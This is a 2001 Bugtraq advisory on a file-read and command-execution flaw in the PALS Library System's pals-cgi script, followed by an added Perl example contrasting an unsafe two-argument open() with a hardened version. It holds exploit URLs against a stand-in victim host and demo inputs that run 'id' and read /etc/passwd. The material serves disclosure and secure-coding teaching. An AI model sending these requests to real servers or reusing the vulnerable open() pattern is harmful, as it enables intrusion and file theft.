[19149] in bugtraq
PALS Library System "show files" Vulnerability and remote command
daemon@ATHENA.MIT.EDU (UkR-XblP)
Mon Feb 12 17:22:00 2001
Message-ID: <web-16665872@backend2.aha.ru>
Date: Mon, 12 Feb 2001 17:17:46 +0300
Reply-To: UkR-XblP <cuctema@OK.RU>
From: UkR-XblP <cuctema@OK.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
Name: PALS Library System "show files" Vulnerability and remote command execution.
Date: 02.02.2001
About: This script is derived from an idea that originated at
St.Olaf College to provide a www interface to the PALS
Library System. The idea was then developed further at Georgia
State University. This version of WebPals has been written
using their original idea.
Problem: Through this bug an attacker can read any file the web
server can read and can execute commands. The documentName
parameter is used as a file name without sanitization, the same
class of flaw as the "pine pipe bug".
Author: UkR-XblP
Exploit:
http://www.victim.com/cgi-bin/pals-cgi?palsAction=restart&documentName=url_to_file
http://www.victim.com/pals-cgi?palsAction=restart&documentName=url_to_command
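The following is an added illustration of the bug class named above, not pals-cgi's own code. It shows a CGI parameter used as the file name in Perl's two-argument open(), where a trailing "|" turns the "file name" into a command, beside a hardened form. Only the parameter name documentName comes from the advisory; the document directory, the function names and the sample inputs are assumed.

```perl
#!/usr/bin/perl
# Illustration of the "pipe open" bug class (added example, not pals-cgi code).
# Assumptions: documents live under $DOC_ROOT; documentName is user input.
use strict;
use warnings;
use File::Spec;

my $DOC_ROOT = '/var/www/webpals/docs';   # assumed document directory

# Vulnerable: two-argument open() parses its second argument. A value such
# as "/etc/passwd" opens that file for reading; a value such as "id|" is
# treated as a command whose standard output is read, because a trailing
# '|' means "open a pipe from this command".
sub show_document_vulnerable {
    my ($document_name) = @_;
    open(my $fh, $document_name) or return "cannot open $document_name: $!";
    local $/;                      # slurp the whole stream
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Hardened: three-argument open() never interprets the name as a pipe, the
# name is limited to a conservative character set (no '/', no '|', no
# whitespace), '.' and '..' are rejected, and the file is always resolved
# relative to $DOC_ROOT.
sub show_document_safe {
    my ($document_name) = @_;
    die "bad document name\n"
        unless defined $document_name
            && $document_name =~ /\A[A-Za-z0-9._-]{1,64}\z/;
    die "bad document name\n" if $document_name =~ /\A\.\.?\z/;   # '.' or '..'
    my $path = File::Spec->catfile($DOC_ROOT, $document_name);
    open(my $fh, '<', $path) or die "no such document\n";
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Demonstration (runs locally; the vulnerable call really executes 'id').
print "vulnerable, 'id|':\n",          show_document_vulnerable('id|');
print "vulnerable, '/etc/passwd':\n",  show_document_vulnerable('/etc/passwd');
for my $name ('id|', '../../etc/passwd', '/etc/passwd', 'readme.txt') {
    my $out = eval { show_document_safe($name) };
    print "safe, '$name': ", ($@ ? "rejected: $@" : "served\n");
}
```

Run it as an unprivileged user in a scratch directory. The first two calls print the output of id and the contents of /etc/passwd, the three hostile names are rejected by the hardened function, and readme.txt is served only if it exists under the assumed document directory (otherwise it is reported as "no such document").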